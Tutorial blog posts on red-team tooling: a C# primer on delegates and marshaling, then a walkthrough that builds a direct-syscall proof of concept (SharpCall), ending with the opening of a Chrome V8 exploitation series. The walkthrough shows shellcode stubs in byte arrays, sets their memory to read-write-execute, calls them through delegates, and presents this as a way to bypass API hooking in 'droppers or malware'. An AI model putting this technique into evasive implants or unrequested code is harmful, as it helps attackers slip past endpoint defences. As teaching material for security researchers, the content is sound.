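To illustrate the "object instance plus method" point, here is a small sketch in plain managed code. The Counter class, the Step delegate, and ApplyTwice are all hypothetical names used only for this example.

```csharp
using System;

public class Counter
{
    private int count;

    // Instance method: its result depends on the state of this particular object.
    public int Increment(int step)
    {
        count += step;
        return count;
    }
}

public static class DelegateDemo
{
    // Delegate type: takes an int and returns an int.
    public delegate int Step(int amount);

    // Accepts any method with a matching signature as a parameter.
    public static int ApplyTwice(Step step, int amount)
    {
        step(amount);
        return step(amount);
    }

    public static void Main()
    {
        Counter counter = new Counter();

        // The delegate captures both the counter object and its Increment method.
        Step step = new Step(counter.Increment);

        Console.WriteLine(ApplyTwice(step, 5)); // prints 10
    }
}
```

The caller of ApplyTwice never sees the Counter object directly; the delegate carries it along, which is exactly what makes delegates handy as callbacks.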

Since delegates are so flexible in the data they can accept, there's something cool that we can do with all this data.

For example, let's say we execute a native Windows function such as VirtualAlloc, which allows us to reserve, commit, or change the state of a region of pages in the virtual address space of the calling process. This function returns the base address of the allocated memory region.

Let's say, for this example, that we allocated some... oh you know... shellcode per se 😏 - see where I'm going with this? No!? Fine... let me explain.

So if we were able to allocate a memory region in our process that contained shellcode, and obtained a pointer to it, then we can utilize something called type marshaling to transform data types as they cross between managed and native code. This means that we can go from an unmanaged function pointer to a delegate! Meaning that we can execute our assembly or byte array shellcode this way!

So with this general idea, let's jump into this a little deeper!

Type Marshaling & Unsafe Code and Pointers

As stated before, marshaling is the process of transforming types when they need to cross between managed and native code. Marshaling is needed because the types in managed and unmanaged code are different, as we've already seen and demonstrated.

By default, the P/Invoke subsystem tries to do type marshaling based on the default behavior. But, for those situations where you need extra control with unmanaged code, you can utilize the Marshal class for things like allocating unmanaged memory, copying unmanaged memory blocks, and converting managed to unmanaged types, as well as other miscellaneous methods used when interacting with unmanaged code.

A quick example of how this marshaling works can be seen below.
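As a rough sketch of the Marshal class in action, the snippet below allocates a block of unmanaged memory, copies a managed byte array into it, and copies it back out again. MarshalDemo and RoundTrip are names I made up for this illustration; the Marshal methods themselves are the standard ones.

```csharp
using System;
using System.Runtime.InteropServices;

public static class MarshalDemo
{
    // Copy a managed byte array into unmanaged memory and read it back.
    public static byte[] RoundTrip(byte[] managed)
    {
        // Allocate unmanaged memory that the garbage collector does not track.
        IntPtr unmanaged = Marshal.AllocHGlobal(managed.Length);
        try
        {
            // Managed -> unmanaged.
            Marshal.Copy(managed, 0, unmanaged, managed.Length);

            // Unmanaged -> managed.
            byte[] copy = new byte[managed.Length];
            Marshal.Copy(unmanaged, copy, 0, copy.Length);
            return copy;
        }
        finally
        {
            // Unmanaged memory must be released by hand.
            Marshal.FreeHGlobal(unmanaged);
        }
    }

    public static void Main()
    {
        byte[] result = RoundTrip(new byte[] { 0x01, 0x02, 0x03 });
        Console.WriteLine(BitConverter.ToString(result));
    }
}
```

Note the try/finally: since we are outside the garbage collector's reach here, freeing the memory is our job.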

In our case, and for this blog post, the most important Marshal method will be the Marshal.GetDelegateForFunctionPointer method, which allows us to convert an unmanaged function pointer to a delegate of a specified type.
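To get a feel for this method without touching any shellcode, here is a minimal sketch that turns a managed method into a function pointer and then converts that pointer back into a delegate. AddProc, Add, and FunctionPointerDemo are hypothetical names, and the pointer here comes from a managed method rather than from native memory, so treat it purely as a demonstration of the API shape.

```csharp
using System;
using System.Runtime.InteropServices;

public static class FunctionPointerDemo
{
    // Delegate type describing the signature behind the function pointer.
    [UnmanagedFunctionPointer(CallingConvention.StdCall)]
    public delegate int AddProc(int a, int b);

    private static int Add(int a, int b)
    {
        return a + b;
    }

    // Keep the source delegate alive for as long as its pointer is in use.
    private static readonly AddProc Original = new AddProc(Add);

    public static int CallThroughPointer(int a, int b)
    {
        // Delegate -> raw function pointer.
        IntPtr functionPointer = Marshal.GetFunctionPointerForDelegate(Original);

        // Raw function pointer -> delegate of the specified type.
        AddProc fromPointer = (AddProc)Marshal.GetDelegateForFunctionPointer(
            functionPointer, typeof(AddProc));

        return fromPointer(a, b);
    }

    public static void Main()
    {
        Console.WriteLine(CallThroughPointer(1, 2));
    }
}
```

The non-generic overload is used so the sketch also fits older .NET Framework versions.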

Now there are a ton of other types you can marshal to and from, and I highly suggest you read up on them as they are a very integral part of the .NET framework and will come in handy whenever you write red team tools, or even defensive tools if you are a defender.

Alright, so we know that we can marshal our memory pointers to delegates - but now the question is, how are we able to create a memory pointer to our assembly data? Well in fact, it's quite easy. We can use some simple pointer operations to get the memory address of our ASM code.

Since C# does not support pointer operations by default, what we can do is declare a portion of our code to be unsafe. This simply denotes an unsafe context, which is required for any operation involving pointers. Overall, this allows us to carry out pointer operations such as pointer dereferencing.

Now the only caveat is that to compile unsafe code, you must specify the -unsafe compiler option.

So knowing this, let's go over a quick example.

If we wanted to - let's say - execute the syscall for NtOpenProcess, what we would do is start by writing the assembly into a byte array like so.

using System;
using System.ComponentModel;
using System.Runtime.InteropServices;

namespace SharpCall
{
    class Syscalls
    {

        static byte[] bNtOpenProcess =
        {
            0x4C, 0x8B, 0xD1,               // mov r10, rcx
            0xB8, 0x26, 0x00, 0x00, 0x00,   // mov eax, 0x26 (NtOpenProcess Syscall)
            0x0F, 0x05,                     // syscall
            0xC3                            // ret
        };
    }
}

Once we have our byte array completed for our syscall, we would then use the unsafe keyword to denote an area of code where an unsafe context will occur.

Within that unsafe context, we can initialize a new byte pointer called ptr and point it at syscall, which houses our byte array assembly. As you will see below, we utilize the fixed statement, which prevents the garbage collector from relocating a movable variable - or in our case the syscall byte array.

Without a fixed context, garbage collection could relocate the variables unpredictably and cause errors later down the line during execution.

Afterwards, we simply cast the byte array pointer into a C# IntPtr called memoryAddress. Doing this will allow us to obtain the memory location of where our syscall byte array is located.

From here we can do multiple things like use this memory region in a native API call, or we can pass it to other managed C# functions, or we can even use it in delegates!

An example of what I explained above can be seen below.

using System;
using System.ComponentModel;
using System.Runtime.InteropServices;

namespace SharpCall
{
    class Syscalls
    {
        // NtOpenProcess Syscall ASM
        static byte[] bNtOpenProcess =
        {
            0x4C, 0x8B, 0xD1,               // mov r10, rcx
            0xB8, 0x26, 0x00, 0x00, 0x00,   // mov eax, 0x26 (NtOpenProcess Syscall)
            0x0F, 0x05,                     // syscall
            0xC3                            // ret
        };

        public static NTSTATUS NtOpenProcess(
            // Fill NtOpenProcess Parameters
            )
        {
            // set byte array of bNtOpenProcess to new byte array called syscall
            byte[] syscall = bNtOpenProcess;

            // specify unsafe context
            unsafe
            {
                // create new byte pointer and set value to our syscall byte array
                fixed (byte* ptr = syscall)
                {
                    // cast the byte array pointer into a C# IntPtr called memoryAddress
                    IntPtr memoryAddress = (IntPtr)ptr;
                }
            }
        }
    }
}

And that about does it!

We now know how we can take shellcode from a byte array and execute it within our C# application by using unmanaged code, unsafe context, delegates, marshaling and more!

I know this was a lot to cover, and honestly it's a little complex at first - so take your time to read this through and make sure you understand the concepts.

In our next blog post, we will focus on actually writing the code to execute a valid syscall by utilizing everything that we learned here! In addition to writing the code, we'll also go over some concepts for managing your "tools" code and how we can prepare it for future integration with other tools.

Thanks for reading, and stay tuned for Part 2!

Red Team Tactics: Utilizing Syscalls in C# - Writing The Code

16 April 2020 at 00:00

In my previous post "Red Team Tactics: Utilizing Syscalls in C# - Prerequisite Knowledge", we covered some basic prerequisite concepts that we needed to understand before we could utilize syscalls in C#. We touched on some in-depth topics like Windows internals and of course syscalls. We also went over how the .NET Framework functions and how we can utilize unmanaged code in C# to execute our syscall assemblies.

Now, if you haven't read my previous post yet - then I highly recommend that you do so. Otherwise you might be lost and totally unfamiliar with some of the topics presented here. Of course, I'll try to explain the best I can and provide links to external resources for some topics - but everything (mostly everything) that will be talked about here is in the previous post! 😁

For today's blog post, we will focus on actually writing the code to execute a valid syscall by utilizing everything that we learned. In addition to writing the code, we'll also go over some concepts for managing our code so that we can prepare it for future integration with other tools. This integration idea will be similar to how SharpSploit by Ryan Cobb was developed to be integrated with other C# projects - but ours won't go to such an extent.

My initial idea for this part of the blog post was to walk you through developing an actual tool that we could use during operations - like Dumpert or SysWhispers. But after some consideration to how long and complex the blog post would get, I instead opted to code a simple PoC (Proof of Concept) demonstrating the execution of a single syscall.

I truly believe that after reading this blog post and going over the code example (which I will also post on GitHub), you'll be able to code a tool on your own! I'll also include a few links to tools that utilize the same syscall concepts in C# at the end of this post if you need more inspiration.

Who knows, maybe I'll opt to do a live stream where we can all write a cool new tool together! 😏

Alright, with that out of the way, let's open up Visual Studio or Visual Studio Code, and get our hands dirty with some code!

Devising our Code and Class Structure

If there's one thing that I learned when writing custom tools for red team operations - be it malware or some sort of implant - it's that we need to organize our code and ideas, and separate them into classes.

Classes are one of the most fundamental of C#'s types. Simply put, a class is a data structure that combines fields and methods (as well as other function members) in a single unit. Of course classes can be used as objects and support inheritance and polymorphism, which are mechanisms whereby our derived classes can extend and specialize other base classes.

Upon creation, these classes can then be utilized across our code base by adding a "using static" directive inside another source code file. This will then allow us to access that class's static members and nested types without having to qualify the access with the class name.

For example, let's say we had a new class called "Syscalls" that housed our syscall logic. If we didn't add the using static directive to our C# code, then we would need to qualify our function with the class name. So if our Syscalls class contained a syscall assembly for NtWriteFile, then to access that method inside another class, we would do something like Syscalls.NtWriteFile. Which is fine, but it gets tiresome after a few times of calling the class repeatedly.
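Here is a tiny sketch of the difference, assuming a compiler that supports the using static directive (C# 6 or later). The SharpCallDemo namespace and the placeholder NtWriteFile method are made up for this illustration and do not perform any real syscall.

```csharp
using System;
using static SharpCallDemo.Syscalls;

namespace SharpCallDemo
{
    public static class Syscalls
    {
        // Placeholder standing in for a real syscall wrapper.
        public static string NtWriteFile()
        {
            return "NtWriteFile called";
        }
    }

    public static class Program
    {
        // Without the directive we would have to qualify the call like this.
        public static string Qualified()
        {
            return Syscalls.NtWriteFile();
        }

        // With "using static" the class name can be dropped.
        public static string Unqualified()
        {
            return NtWriteFile();
        }

        public static void Main()
        {
            Console.WriteLine(Qualified());
            Console.WriteLine(Unqualified());
        }
    }
}
```

Both calls resolve to the same method; the directive only saves us the typing.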

Now, some of you might ask - "Why do we need this?"

Two reasons. One, it's for organizational purposes and to keep our code "clean". Two, it allows us to debug and fix issues in our code with ease instead of scrolling through a massive blob of text and trying to find the hide and seek champion known as the semicolon.

With that aside, let's begin by organizing our code! For starters, let's create a new project for a .NET Framework Console App and set it to use the 3.5 .NET Framework - like so.

Once completed, you should now have access to a new C# file called Program.cs. If we look at the right hand side of Visual Studio, we will notice that in our Solution Explorer we have the following solution structure.

+SharpCall SLN (Solution)
|
+->Properties
|
+->References
|
+->Program.cs (Main Program)

Our Program.cs file will house the main logic of our application. In the case of our PoC, we will want to call and utilize our syscalls in this file. As seen before, system calls occur within the CPU when the syscall instruction is called along with a valid syscall identifier. This instruction causes the CPU to switch from user mode to kernel mode to carry out certain privileged operations.

If we were to utilize just one syscall, then we could simply include it in the Program.cs file. But by doing so, we would cause ourselves some headaches if later down the line we decided to build this program out for more modularity or flexibility, to more easily integrate with other applications - be that droppers or malware.

So we always need to think ahead - and to start, it would be a good idea to separate all our syscall assemblies into a separate file. This way, if the need arises to integrate more syscalls, then we can just add them into one class and simply call the assemblies from our program.

And that's exactly what we are going to do here! We'll start by adding a new file inside our solution and call it Syscalls.cs. Our solution structure should now look similar to the following.

+SharpCall SLN (Solution)
|
+->Properties
|
+->References
|
+->Program.cs (Main Program)
|
+->Syscalls.cs (Class to Hold our Assembly and Syscall Logic)

Great, we can start coding now, right? Well not really - we're forgetting one major thing here. Remember that since we'll be using unmanaged code, we also need to declare the Windows API functions so that we can call them from our C# program. And to utilize unmanaged functions, we need to platform invoke (P/Invoke) their structs and parameters, as well as any other additional flag fields.

Again, we can do this in the Program.cs file, but it will be much cleaner and more organized if we do all the P/Invoke work in a separate class. So, let's add another file to our solution and call it Native.cs - since it will house our "native" Windows functions.

Our solution structure should now look similar to the following:

+SharpCall SLN (Solution)
|
+->Properties
|
+->References
|
+->Program.cs (Main Program)
|
+->Syscalls.cs (Class to Hold our Assembly and Syscall Logic)
|
+->Native.cs (Class to Hold our Native Win32 APIs and Structs)

Now that we have our application organized, and know what goes where, we can finally start coding!

Writing our Syscall Code

Since this is a proof of concept, I will use the NtCreateFile system call to create a temporary file on our desktop. If we can get this to work then it'll validate that our code logic is solid. Afterwards, we would then be able to focus on writing more complex tools and expanding our Syscalls class with additional system calls.

Also, quick note - all of the code written below will only work on x64 systems and not x86.

Alright, to start, we need to get the assembly for our NtCreateFile syscall. As explained and detailed in my previous post, we can do so by utilizing WinDBG to disassemble and inspect the NtCreateFile function in ntdll.

Upon getting the memory address of the function, and disassembling the instructions at that address, we should now see the following output.

Upon looking at the disassembly, we see that our syscall identifier is 0x55. And if we look to the left of the assembly instructions, we'll see the hexadecimal representation of our syscall instructions. Since there is no inline assembly in C#, we're going to utilize these hexadecimal bytes as shellcode, which will be added to a simple byte array.

We'll do this by navigating to our Syscalls.cs file, and inside our Syscalls class, we'll create a new static byte array called bNtCreateFile - as shown.
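As a sketch of what that array can look like, the block below reuses the instruction pattern from the NtOpenProcess example in the previous post and swaps in the 0x55 identifier seen in the disassembly. It is a reconstruction under that assumption, so check the bytes against your own WinDBG output, since syscall identifiers differ between Windows builds. The members are marked public here only so the sketch can be inspected from outside the class.

```csharp
using System;

namespace SharpCall
{
    public class Syscalls
    {
        // NtCreateFile syscall stub (x64 only), following the same pattern
        // as the NtOpenProcess stub; 0x55 is the identifier from the disassembly.
        public static byte[] bNtCreateFile =
        {
            0x4C, 0x8B, 0xD1,               // mov r10, rcx
            0xB8, 0x55, 0x00, 0x00, 0x00,   // mov eax, 0x55 (NtCreateFile Syscall)
            0x0F, 0x05,                     // syscall
            0xC3                            // ret
        };
    }

    public static class StubInfo
    {
        public static void Main()
        {
            // Print the stub so it can be compared with the debugger output.
            Console.WriteLine(BitConverter.ToString(Syscalls.bNtCreateFile));
        }
    }
}
```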

Awesome, so we have our first syscall assembly completed! But how are we going to build out the code to execute this? Well, if you paid attention in my previous post then you would have learned about something called delegates.

Delegates are simply a type that represents references to methods with a particular parameter list and return type. When you instantiate a delegate, you can associate its instance with any method that has a compatible signature and return type. We can then invoke our delegated method through the delegate instance.

This might sound a little confusing, but if you recall, in my last post we defined a new delegate called EnumWindowsProc and later defined the delegate's implementation via OutputWindow. This implementation for the delegate simply told C# what we want to do with the data that is passed to this function reference - be it from managed or unmanaged code.

We can do the same thing here in our Syscalls.cs class by defining a delegate to our unmanaged function - which in this case will be NtCreateFile. Once that delegate has been defined, we can go ahead and implement the logic that will handle transforming our syscall assembly to a valid function.

But let's not get ahead of ourselves. First, we need to define the signature for our NtCreateFile delegate. To do so, we'll start by creating a new public struct type called Delegates within our Syscalls class.

This struct will house the signatures of all our native function delegates so they can be utilized by our syscalls.

Before we define our delegate, let's take a look at the C syntax of NtCreateFile.

__kernel_entry NTSTATUS NtCreateFile(
  OUT PHANDLE           FileHandle,
  IN ACCESS_MASK        DesiredAccess,
  IN POBJECT_ATTRIBUTES ObjectAttributes,
  OUT PIO_STATUS_BLOCK  IoStatusBlock,
  IN PLARGE_INTEGER     AllocationSize,
  IN ULONG              FileAttributes,
  IN ULONG              ShareAccess,
  IN ULONG              CreateDisposition,
  IN ULONG              CreateOptions,
  IN PVOID              EaBuffer,
  IN ULONG              EaLength
);

After looking at the syntax, we quickly notice a few things that we haven't seen before.

First of all, we notice that the NtCreateFile function has a return type of NTSTATUS, which is a 32-bit status code with a distinct value for each message identifier. We also see that a few of the function parameters accept a set of different flags and structures, such as the ACCESS_MASK flags, the OBJECT_ATTRIBUTES structure, and the IO_STATUS_BLOCK structure.

If we take a peek at the other function parameters like FileAttributes and CreateOptions, we'll see that they also accept specific flags.

So here lies the core problem of utilizing unmanaged code in C# - which is the fact that we need to manually create these flag enumerators and structures to contain the same value codes that Windows has. Otherwise if the parameters we pass into our syscall contain unexpected values, it will then cause the syscall to either break or return errors.

Thankfully for us, the P/Invoke wiki comes to the rescue. Here we can lookup how to implement our native functions, structs, and flags.

You can also use the Microsoft Reference Source website and search for the specific structures and access flags you need. These will be much closer to the original Windows references than what P/Invoke might have.

The following links should help us implement the necessary structures and flags needed to execute NtCreateFile with the proper parameter values:

Since these values, structures and flags are all "native" to Windows, let's go ahead and add them to the Native.cs file under the Native class.

After everything is implemented and cleaned up, part of your Native.cs file should look something like this.
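As a rough idea of the shape such a file takes, here is a minimal sketch of a few of these definitions. The struct layouts follow the documented Windows definitions, but the enum member names and the exact selection are my assumptions for illustration; this is not the Native.cs from the SharpCall project.

```csharp
using System;
using System.Runtime.InteropServices;

namespace SharpCall
{
    public static class Native
    {
        // Counted UTF-16 string used throughout the NT native API.
        [StructLayout(LayoutKind.Sequential)]
        public struct UNICODE_STRING
        {
            public ushort Length;          // length of the string in bytes
            public ushort MaximumLength;   // size of Buffer in bytes
            public IntPtr Buffer;          // pointer to the UTF-16 characters
        }

        // Describes the object (here: the file) a native call operates on.
        [StructLayout(LayoutKind.Sequential)]
        public struct OBJECT_ATTRIBUTES
        {
            public int Length;             // size of this structure in bytes
            public IntPtr RootDirectory;
            public IntPtr ObjectName;      // pointer to a UNICODE_STRING
            public uint Attributes;
            public IntPtr SecurityDescriptor;
            public IntPtr SecurityQualityOfService;
        }

        // Receives the final completion status of the I/O request.
        [StructLayout(LayoutKind.Sequential)]
        public struct IO_STATUS_BLOCK
        {
            public IntPtr Status;          // union of NTSTATUS and a pointer
            public IntPtr Information;
        }

        // Subset of the documented FILE_SHARE_* values (member names assumed).
        [Flags]
        public enum FileShare : uint
        {
            None = 0x00000000,
            Read = 0x00000001,
            Write = 0x00000002,
            Delete = 0x00000004
        }
    }
}
```

The LayoutKind.Sequential attribute matters here: it keeps the fields in declaration order so the marshaler lays them out the way the native side expects.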

As a side note - this is just a small subset of the implemented native structs and flags. If you want to see the full implementation, then take a look at the Native.cs file from the SharpCall project on my GitHub.

Also, take note of how we use the public keyword before each struct and flag enumerator. This is done so that we can access the objects from other files in our program.

Awesome, now that we have those implemented we can go ahead and convert the C++ data types of NtCreateFile to C# data types. After conversion your C# syntax should look like this:

NTSTATUS NtCreateFile(
  out Microsoft.Win32.SafeHandles.SafeFileHandle FileHandle,
  FileAccess DesiredAccess,
  ref OBJECT_ATTRIBUTES ObjectAttributes,
  ref IO_STATUS_BLOCK IoStatusBlock,
  ref long AllocationSize,
  FileAttributes FileAttributes,
  FileShare ShareAccess,
  CreationDisposition CreateDisposition,
  CreateOption CreateOptions,
  IntPtr EaBuffer,
  uint EaLength
);

Now, before we implement this structure as a delegate, let’s just brief over some of the converted data types.

As said before, usually any pointers or handles in C++ can be converted to an IntPtr in C#, but in this case you will notice that I converted the PHANDLE (a pointer to a handle) to be that of a SafeFileHandle data type. The reason we do this is because a SafeFileHandle represents a wrapper class for a file handle that C# will understand.

And since we are dealing with creating files and will be passing this data via delegates from managed to unmanaged code (and vice versa), we need to make sure that C# can handle and understand the data type it’s marshaling, otherwise we might encounter errors.

The rest should be self explanatory, as the FileAttributes, FileShare and those data types are simply a representation of the varaibles and values inside the structures and flag enumerators that we added to the Native class. This just tells C# that whenever data is passed into these parameters - be it a value or descriptor - then it needs to be referenced against that specific struct/flag enumerator.

A few others things you might have noticed is that I added the ref and out keywords to some of the parameters. Simply, these keywords indicate that arguments can to be passed by reference and not by value.

The difference between ref and out is that for the ref keyword, the argument must be initialized before it is passed, unlike out where we don’t have to. The other difference is that for ref, data can be passed bi-directionally, and any changes made to the argument inside the called method will be reflected in that variable when control returns to the calling method. For out, data is passed in only one direction: the called method must assign a value before it returns, and that value is what ends up in the caller’s variable.

So in the case of NtCreateFile, we set the out keyword for FileHandle since this will be a pointer to a variable that receives the file handle if the call is successful. This simply means that data is only being passed back “out” to us.

Makes sense? Good!

Now that we have this, we can finally add our C# syntax for NtCreateFile inside our newly added Delegates structure within our Syscalls class.

Once done, our Syscalls class should now look something like this.

NOTE: You might notice that I added using static SharpCall.Native at the top of the file. This simply tells C# to use the static class called Native. As explained before, we do this so we can directly use our native functions, struct and flag imports.

Alright, before we go any further, take note that in the Delegates structure, before we set up our NtCreateFile delegate, I’m applying the UnmanagedFunctionPointer attribute. This attribute controls the marshaling behavior of a delegate signature as an unmanaged function pointer when it’s passed to or from unmanaged code.

This is a critical piece of information that we need to include since we will be using unsafe code to marshal our unmanaged pointer from the syscall assembly to these function delegates - as explained in my previous post.

Awesome, we’re making some progress! Now that we have our structures, flag enumerations, and our function delegate defined, we can go ahead and begin implementing the delegate to handle any parameters passed into it. These parameters will then be handled by our syscall assembly.

Let’s go ahead and create (or in other words instantiate) our NtCreateFile function delegate. We can do this directly after our syscall assembly.

Once done, your Syscalls.cs file should look similar to what’s shown below.

The brackets with the TODO comment (right after our instantiated delegate) are where we will add the code to handle the data being passed to and from managed and unmanaged code.

If you recall from my last post, I explained how the Marshal.GetDelegateForFunctionPointer allows us to convert an unmanaged function pointer to a delegate of a specified type. By using that with the unsafe context, it would allow us to create a pointer to a memory location where our shellcode is located (which would be our syscall assembly) and will allow us to execute the assembly from managed code via the delegate.

We’ll be doing the same thing here. So for starters, let’s make sure that we create a new byte array called syscall and set it to the same value as our bNtCreateFile assembly. Once done, specify the unsafe context and add some brackets which will house our unsafe code.

Once completed your newly updated Syscalls.cs file should look similar to the following.

Now, just as I explained in my previous post - within that unsafe context, we will initialize a new byte pointer called ptr and set that to the value of syscall - which houses our byte array assembly.

As you will see below and as explained previously, we utilize the fixed statement for this pointer so that we can prevent the garbage collector from relocating our syscall byte array in memory.

Afterwards, we will simply cast the byte array pointer into an IntPtr called memoryAddress. Doing this will allow us to obtain the memory address of where our syscall byte array is located within our application during execution.

Upon doing the above, our updated Syscalls.cs file should look like the one presented below.

Now for this part, I suggest you pay close attention as this is where the magic happens! 😉

Since we now have (or will have) a memory address of where our syscall assembly is located during application execution, we need to do something to make sure that it will execute properly within its allocated memory region.

If you’re familiar with how shellcode works during exploit development, you’ll know that whenever we want to write, read, or even execute shellcode within our target process or targeted memory pages, we need to make sure that those memory regions have the proper access rights. If you’re unfamiliar with this, then go read about how the Windows security model enables you to control process security and access rights.

For example, let’s see what kind of memory protections NtCreateFile has within notepad when it’s executing.

0:000> x ntdll!NtCreateFile
00007ffb`f6b9cb50 ntdll!NtCreateFile (NtCreateFile)
0:000> !address 00007ffb`f6b9cb50

Usage:                  Image
Base Address:           00007ffb`f6b01000
End Address:            00007ffb`f6c18000
Region Size:            00000000`00117000 (   1.090 MB)
State:                  00001000          MEM_COMMIT
Protect:                00000020          PAGE_EXECUTE_READ
Type:                   01000000          MEM_IMAGE
Allocation Base:        00007ffb`f6b00000
Allocation Protect:     00000080          PAGE_EXECUTE_WRITECOPY
Image Path:             ntdll.dll
Module Name:            ntdll
Loaded Image Name:      C:\Windows\SYSTEM32\ntdll.dll
Mapped Image Name:      
More info:              lmv m ntdll
More info:              !lmi ntdll
More info:              ln 0x7ffbf6b9cb50
More info:              !dh 0x7ffbf6b00000

Content source: 1 (target), length: 7b4b0

As shown above, notepad has Read and Execute permissions for NtCreateFile within its process’s virtual memory. The reason for this is that notepad needs to be able to read and execute the instructions of the syscall stub, but never needs to modify them.

In my previous post I explained how each application’s virtual address space is private, and how one application can’t alter the data that belongs to another application - unless the process makes part of its private address space available.

Now since we are using the unsafe context in C#, and are crossing the boundary between managed and unmanaged code, we need to manage the memory access within our program’s virtual memory space ourselves, since the CLR won’t do that for us! We need to do this so we can write our parameters to our syscall, execute the syscall, and also read the returned data for our delegate!

But how can we do that? Well let me introduce you to our new little friend and lovely function called VirtualProtect.

What VirtualProtect allows us to do is change the protection on a region of committed pages in the virtual address space of the calling process. Meaning that by using this native function against our syscall’s memory address (which we just obtained) we can make sure that the memory region is set to read-write-execute!

So with that, let’s implement this native function inside Native.cs. This way we can use it within Syscalls.cs to change the memory protection on our assembly.

As always, let’s take a peek at the C signature for this function.

BOOL VirtualProtect(
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flNewProtect,
  PDWORD lpflOldProtect
);

It seems simple enough. We just need to remember to add the flNewProtect flags along with the function.

Let’s go ahead and add this. Once done, our implemented memory protection flags inside the Native class should look like so.

And the VirtualProtect function will look similar to the following.

Beautiful! We’ve made a ton of progress already and we’re nearing the end! Well… sort of. There are still a few more things to do.

Now that we have our VirtualProtect function implemented, let’s return to our Syscalls.cs file, and execute the VirtualProtect function against our memoryAddress pointer to give it read-write-execute permissions.

At the same time, let’s put this native function inside an IF statement. That way if the function fails, we can throw a Win32Exception to show us the error code and stop execution.

Also, make sure to add the using System.ComponentModel; directive at the top of your code. This way, you’ll be able to use the Win32Exception class.

Upon doing this, our code should look like the following:

Alright, so if the execution of VirtualProtect is successful, then the virtual memory address of our unmanaged syscall assembly (which the memoryAddress variable is pointing to) should now have read-write-execute permissions.

This means that we now have an unmanaged function pointer. So as explained before, and in my previous post, what we need to do now is utilize Marshal.GetDelegateForFunctionPointer to convert our unmanaged function pointer to a delegate of a specified type. In this case, we will be converting our function pointer to our NtCreateFile delegate.

Now, I know some of you might be a little confused or wondering why we are doing this. It should have become apparent what we are trying to do when I explained the memory protections. But either way, let me explain this so we’re all on the same page before we move on.

The reason we are converting our unmanaged function pointer to our NtCreateFile delegate is so that the function will behave like a callback function when our syscall assembly is executed. Take a look back into line 20 of our Syscalls.cs file.

What are we doing there? If your answer was “passing parameters into a function” then you’re right!

Once this delegate accepts our parameters to create a file, it will go ahead and update the memory location of our syscall to be read-write-execute. It will then take this pointer to the syscall and convert it to our NtCreateFile delegate - which essentially is just converting our syscall to its actual function representation.

Once that’s done, we will call the return statement against our initialized delegate along with our passed parameters. It’s essentially at this point that we are pushing the parameters onto the stack, executing the syscall, and returning the results back to the caller - which should be coming from Program.cs!

Makes sense now? Perfect! Consider yourself a graduate of syscall academy! 👨‍🎓

Okay, with all that explained let’s go ahead and implement our Marshal.GetDelegateForFunctionPointer conversion by first instantiating our NtCreateFile delegate and calling it assembledFunction. Once done, let’s carry out the conversion of our unmanaged pointer to our delegate.

After that’s completed, we can write a simple return statement that calls the instantiated assembledFunction delegate with all of our parameters and returns the result of the syscall.

Our finalized Syscalls.cs code should now look like the following.

And there we have it, the finalized version of how our syscall will execute once its function is called!

Executing our Syscall

So, we implemented our syscall logic. Now all that’s left to do is to actually write the code in our program to utilize the NtCreateFile function, which will in turn execute our syscall.

For starters, let’s make sure we import our static classes so that we can use all our native functions and our syscall, like so.

Once that’s done, we can start initializing the structures and variables required by NtCreateFile, such as the file handle and object attributes.

But before we do that, let me just state one thing. The OBJECT_ATTRIBUTES structure, specifically its ObjectName member, requires a pointer to a UNICODE_STRING that contains the name of the object for which a handle is to be opened. In our case, this is the name of the file that we want to create.

Now, for unmanaged code, to initialize this structure we need to call the RtlUnicodeStringInit function.

So, let’s make sure we add that function inside our Native.cs file so we can utilize it.

Once we have that, we can then go ahead and initialize our first few structures. We’ll create our file handle, as well as our unicode string structure.

We’ll opt for saving our test file to our desktop, so we’ll set the filename path to be C:\Users\User\Desktop\test.txt as shown below.

After completing that, we can now initialize our OBJECT_ATTRIBUTES structure.

Finally, all that’s left to do is to initialize the IO_STATUS_BLOCK structure, and call our NtCreateFile delegate along with its parameters to execute the syscall!

After writing all that, your final Program.cs file should look like the following.

Awesome, we finally completed our code! Now comes the most important part - compiling the code!

In Visual Studio make sure we change the Solution Configuration to “Release”. From there, in the toolbar above, click on Build -> Build Solution.

After a few seconds you should see the following output, which shows us that compilation was successful!

Okay, let’s not get too excited! The code might still fail during testing, but I’m sure it won’t! 😁

To test our newly compiled code, let’s open up command prompt and navigate to where our project is compiled. In my case that’s C:\Users\User\Source\Repos\SharpCall\bin\Release\.

As shown below, there is currently no test.txt file on my desktop.

If everything goes well, then upon executing our SharpCall.exe executable, our syscall should be executed, and a new test.txt file should be created on the desktop.

Alright, the moment of truth. Let’s see this bad boy in action!

And there we have it! Our code works and we were able to successfully execute our syscall!

But, how can we be so sure that it was the syscall that executed and not just the native API function from ntdll?

Well to make sure that it was our syscall that executed, we can once again utilize Process Monitor to monitor our executable.

From here, we can view specific Read/Write operation properties and their call stack.

After monitoring the process during execution, we see that there was one CreateFile operation for our test.txt file. If we were to view the call stack of that operation, we would see the following.

Well look at that! No calls from or to ntdll were made! Just a simple syscall from an unknown memory location to ntoskrnl.exe! We made a valid syscall!

This essentially would bypass any API hooking if there was one implemented on NtCreateFile! 😈

Closing

And there we have it, ladies and gentlemen! After learning a lot about Windows Internals, Syscalls, and C#, you should now be able to utilize what you learned here to create your own syscalls in C#!

The final code for this project has been added to the SharpCall repository on my GitHub.

Now I did mention at the start of this blog post that I’ll post a few links to projects that utilize that same functionality. So if you get stuck or just want some inspiration then I suggest you look at the following projects.

Alright, well, that’s pretty much it! I really appreciate everyone for reading these blog posts and for making Part 1 such a shocking success! I wasn’t expecting it to be so well received. Hopefully you enjoyed this part as much as Part 1, and I also hope you learned something new!

Thanks for reading everyone! Cheers!

Chrome Browser Exploitation, Part 1: Introduction to V8 and JavaScript Internals

22 October 2022 at 00:00

Web browsers, our extensive gateway to the internet. Browsers today play a vital role in modern organizations as more and more software applications are delivered to users via a web browser in the form of web applications. Pretty much everything you might have done on the internet involves the use of a web browser, and as a result, browsers are among the most utilized consumer facing software products on the planet.

As the gateway to the internet, browsers also introduce significant risks to the integrity of personal computing devices. We hear it almost on a daily basis now, “Google Chrome Bug Actively Exploited as Zero-Day”, or “Google Confirms Chrome’s Fourth Zero-Day Exploit In 2022”. In fact, browser exploits are nothing new; they’ve been occurring for years now, with the first known documented remote-code-execution exploit being CVE-1999-0280. The first potentially public disclosure of a browser exploit being used in the wild was the “Aurora” Internet Explorer exploit which affected Google back in December of 2009.

